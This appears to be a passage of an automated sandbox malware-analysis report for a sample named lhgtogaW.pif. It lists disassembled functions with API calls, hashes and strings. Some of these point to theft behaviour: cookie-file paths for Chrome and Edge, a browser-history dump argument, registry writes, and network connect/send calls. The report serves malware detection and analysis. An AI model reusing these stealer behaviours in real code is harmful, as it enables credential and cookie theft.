                                                                                                                                                                    Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                                    • Opcode ID: c512f369c67f66082f7d173342797144b7094dc1fe3561dd0d026d46a773336a
                                                                                                                                                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                                                                                                                    • Opcode Fuzzy Hash: c512f369c67f66082f7d173342797144b7094dc1fe3561dd0d026d46a773336a
                                                                                                                                                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,274C10DF,?,?,?,00000000), ref: 274C1E9A
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C1EAC
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EB3
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EC8
                                                                                                                                                                    • lstrcatW.KERNEL32(?,274C10DF), ref: 274C1ED3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                    • Opcode ID: 5ed89a095bb0fabda72adffcdbe1871794baf1ade42ac012e369fbd0f977a088
                                                                                                                                                                    • Instruction ID: efc67c36c40493b3de9fd5884a8d09407d7d24d829a1dc17f470f1967a153083
                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed89a095bb0fabda72adffcdbe1871794baf1ade42ac012e369fbd0f977a088
                                                                                                                                                                    • Instruction Fuzzy Hash: F3F08936100110BBE721771BAC85EBF777CEFC6A65F04001DFA08831909F58684296B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 004509D4
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 004509E6
                                                                                                                                                                    • _free.LIBCMT ref: 004509F8
                                                                                                                                                                    • _free.LIBCMT ref: 00450A0A
                                                                                                                                                                    • _free.LIBCMT ref: 00450A1C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                                                                                                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 274C91D0
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C91E2
                                                                                                                                                                    • _free.LIBCMT ref: 274C91F4
                                                                                                                                                                    • _free.LIBCMT ref: 274C9206
                                                                                                                                                                    • _free.LIBCMT ref: 274C9218
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 388a06e3406ec610254cfcd40c4e5857bc95e7f0ef0dbdbab6f1a7825174acaa
                                                                                                                                                                    • Instruction ID: 9bc4d51e0f18918412e20ebdc0f734e3c2bf4180fd9370d3d5e388146f048aea
                                                                                                                                                                    • Opcode Fuzzy Hash: 388a06e3406ec610254cfcd40c4e5857bc95e7f0ef0dbdbab6f1a7825174acaa
                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0C279605650EB8611EB98D5C7C8BBBE9EB50715B20080DF988C7600CF38F8C08A50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 00444066
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 00444078
                                                                                                                                                                    • _free.LIBCMT ref: 0044408B
                                                                                                                                                                    • _free.LIBCMT ref: 0044409C
                                                                                                                                                                    • _free.LIBCMT ref: 004440AD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                                                                                                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 274C536F
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C5381
                                                                                                                                                                    • _free.LIBCMT ref: 274C5394
                                                                                                                                                                    • _free.LIBCMT ref: 274C53A5
                                                                                                                                                                    • _free.LIBCMT ref: 274C53B6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: f98f1cc7cdaaea028880fe56308ffd759658519998cfb7e7dc8c84f575c9adb3
                                                                                                                                                                    • Instruction ID: cc001e8d847265385114d0b6d7bc46ec90dd89c269d3d36e6aa7aa966b91fd07
                                                                                                                                                                    • Opcode Fuzzy Hash: f98f1cc7cdaaea028880fe56308ffd759658519998cfb7e7dc8c84f575c9adb3
                                                                                                                                                                    • Instruction Fuzzy Hash: 74F054B8815134EB8A06AF28959748D7FB1F715A58765020EF89493354DF3D05C18B85
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                                                                                                                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                                                                                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                    • String ID: XQG$NG$PG
                                                                                                                                                                    • API String ID: 1634807452-3565412412
                                                                                                                                                                    • Opcode ID: 39074371893d74fb2ec12acfcc5a34c42aad43bb34f679717c647b95d9b37a6d
                                                                                                                                                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                                                                                                                    • Opcode Fuzzy Hash: 39074371893d74fb2ec12acfcc5a34c42aad43bb34f679717c647b95d9b37a6d
                                                                                                                                                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                    • String ID: `#D$`#D
                                                                                                                                                                    • API String ID: 885266447-2450397995
                                                                                                                                                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                                                                                                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 00443475
                                                                                                                                                                    • _free.LIBCMT ref: 00443540
                                                                                                                                                                    • _free.LIBCMT ref: 0044354A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                    • API String ID: 2506810119-1700383835
                                                                                                                                                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                                                                                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 274C4C1D
                                                                                                                                                                    • _free.LIBCMT ref: 274C4CE8
                                                                                                                                                                    • _free.LIBCMT ref: 274C4CF2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                    • API String ID: 2506810119-1700383835
                                                                                                                                                                    • Opcode ID: 51c77eb4cf56bb8937da80d4f6589f8468c64812ba4cd2c9147a01790a70cf5b
                                                                                                                                                                    • Instruction ID: f1f40eb74feee057600cb17146ae0ea93cd7bb3f62834aad1815ffadc1a4dd59
                                                                                                                                                                    • Opcode Fuzzy Hash: 51c77eb4cf56bb8937da80d4f6589f8468c64812ba4cd2c9147a01790a70cf5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 54316DB9A00218EFDB12DB9D8A81DDEBFF8EB95714F51406EE90497310DB748A81CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                                                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                    • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                    • API String ID: 368326130-3219657780
                                                                                                                                                                    • Opcode ID: dbd999bfeb27504071707fe7b73e87745f9622d3df09ef3bcbac7d8253451524
                                                                                                                                                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                                                                                                    • Opcode Fuzzy Hash: dbd999bfeb27504071707fe7b73e87745f9622d3df09ef3bcbac7d8253451524
                                                                                                                                                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcslen.LIBCMT ref: 004162F5
                                                                                                                                                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                    • String ID: !D@$okmode$PG
                                                                                                                                                                    • API String ID: 3411444782-3370592832
                                                                                                                                                                    • Opcode ID: a04d05716512b7121ee97be2d66f1905d69fbc859f79e27ede2103061701d044
                                                                                                                                                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                                                                                                    • Opcode Fuzzy Hash: a04d05716512b7121ee97be2d66f1905d69fbc859f79e27ede2103061701d044
                                                                                                                                                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                                                                                                                    Strings
                                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                                    • Opcode ID: 75dbce385c2a8ae9d20c166458dc6612097bb3936f990f691a4e0541a73d91d3
                                                                                                                                                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                                                                                                    • Opcode Fuzzy Hash: 75dbce385c2a8ae9d20c166458dc6612097bb3936f990f691a4e0541a73d91d3
                                                                                                                                                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                                                                                                                    Strings
                                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                                    • Opcode ID: be62f0baf0bcad7a1b9072f9f99ce740f4c070c9bc296d2e33669ce4abd8d70a
